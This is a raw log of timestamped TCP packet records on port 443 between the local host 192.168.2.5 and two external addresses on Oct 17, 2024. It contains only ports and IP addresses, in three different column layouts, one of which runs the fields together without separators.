Oct 17, 2024 15:03:09.744729996 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:09.818536997 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:09.818692923 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:09.818793058 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:09.818841934 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:09.819334984 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:09.819391012 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:09.819701910 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:09.819757938 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:09.864135027 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:09.864301920 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:09.937175035 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:09.937293053 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:09.937927961 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:09.937983036 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:09.938404083 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:09.938468933 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:09.938921928 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:09.938980103 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:09.939393044 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:09.939449072 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:10.023144960 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:10.023305893 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:10.057581902 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:10.057727098 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:10.057739973 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:10.057754040 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:10.057794094 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:10.057987928 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:10.058043003 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:10.058096886 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:10.058146954 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:10.102615118 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:10.102696896 CEST | 443 | 49704 | 194.76.118.27 | 192.168.2.5
Oct 17, 2024 15:03:10.102713108 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:10.102752924 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:10.106787920 CEST | 49704 | 443 | 192.168.2.5 | 194.76.118.27
Oct 17, 2024 15:03:34.712270975 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:34.712332010 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:34.712403059 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:34.727637053 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:34.727672100 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.361263990 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.361346006 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.440998077 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.441030979 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.441335917 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.441425085 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.461860895 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.507396936 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.603815079 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.603852034 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.603877068 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.603900909 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.603908062 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.603908062 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.603935957 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.603950977 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.603969097 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.603972912 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.604007006 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.604206085 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.604302883 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.604331017 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.604371071 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.604379892 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.604413033 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.604790926 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.604839087 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.608817101 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.608885050 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.733925104 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.733994961 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.733999968 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.734024048 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.734046936 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.734070063 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.734074116 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.734113932 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.734251022 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.734299898 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.734302998 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.734355927 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.734392881 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.734399080 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.734447002 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.735008955 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.735057116 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.735059023 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.735100985 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.854060888 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.854139090 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.854167938 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.854296923 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.854309082 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
Oct 17, 2024 15:03:35.854357958 CEST | 49797 | 443 | 192.168.2.5 | 104.21.56.189
Oct 17, 2024 15:03:35.854363918 CEST | 443 | 49797 | 104.21.56.189 | 192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.854394913 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.854639053 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.854722977 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.854727983 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.854759932 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.854772091 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.854840994 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.854846001 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.855084896 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.855488062 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.855591059 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.855596066 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.855632067 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.855637074 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.855678082 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.855690956 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.855727911 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.855808020 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.855849028 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.975735903 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.975923061 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.976002932 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.976022005 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.976052046 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.976075888 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.976123095 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.976128101 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.976176023 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.976180077 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.976217985 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.976222992 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.976257086 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:35.976259947 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:35.976713896 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.017416954 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.017501116 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.097026110 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.097106934 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.097120047 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.097248077 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.097553968 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.097605944 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.098309994 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.098361015 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.140094042 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.140187025 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.222069979 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.222193956 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.222302914 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.222359896 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.222681046 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.222738028 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.222759008 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.222814083 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.263222933 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.263305902 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.341748953 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.341869116 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.342053890 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.342103958 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.342432022 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.342473030 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.342911959 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.342959881 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.425591946 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.425726891 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.460788012 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.460860968 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.461169958 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.461220980 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.461474895 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.461519957 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.504756927 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.504842043 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.545491934 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.545564890 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.579189062 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.579241991 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.579273939 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.579298019 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.579313993 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.579332113 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.579592943 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.579638958 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.622459888 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.622553110 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.664072037 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.664172888 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.696784019 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.696872950 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.697130919 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.697176933 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.697385073 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.697426081 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.741226912 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.741307974 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.742542028 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.742589951 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.815378904 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.815459013 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.815520048 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.815562010 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.815584898 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.815594912 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.815612078 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.815629005 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.858129978 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.858197927 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.859409094 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.859458923 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.912806988 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.913116932 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.934288025 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.934376001 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.934676886 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.934731960 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:36.934742928 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:36.934793949 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.025201082 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.025213957 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.025249958 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.025391102 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.025391102 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.025413036 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.025451899 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.371798992 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.371817112 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.371836901 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.371871948 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.371900082 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.371915102 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.371933937 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.372133970 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.372165918 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.372176886 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.372193098 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.372209072 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.372221947 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.373032093 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.373045921 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.373087883 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.373094082 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.373102903 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.373116016 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.373121977 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.373137951 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.373143911 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.373167992 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.373191118 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.384176016 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.384197950 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.384242058 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.384257078 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.384274960 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.384290934 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.407316923 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.407339096 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.407375097 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.407393932 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.407412052 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.407435894 CEST49797443192.168.2.5104.21.56.189
                                                                                                      Oct 17, 2024 15:03:37.524183989 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.524218082 CEST44349797104.21.56.189192.168.2.5
                                                                                                      Oct 17, 2024 15:03:37.524267912 CEST49797443192.168.2.5104.21.56.189
Timestamp                             Src Port  Dst Port  Source IP        Dest IP
Oct 17, 2024 15:03:37.524287939 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.524302959 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.524324894 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.567941904 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.567974091 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.568010092 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.568018913 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.568046093 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.568063021 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.642350912 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.642371893 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.642419100 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.642431021 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.642473936 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.643771887 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.643785954 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.643834114 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.643841982 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.643930912 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.760483027 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.760504007 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.760580063 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.760606050 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.762063980 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.762083054 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.762129068 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.762136936 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.762154102 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.762185097 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.878113985 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.878144026 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.878223896 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.878251076 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.879123926 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.879143000 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.879173040 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.879179955 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.879195929 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.879220963 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.972811937 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.972840071 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.972912073 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.972938061 CEST  443       49797     104.21.56.189    192.168.2.5
Oct 17, 2024 15:03:37.973269939 CEST  49797     443       192.168.2.5      104.21.56.189
Oct 17, 2024 15:03:37.997243881 CEST  443       49797     104.21.56.189    192.168.2.5
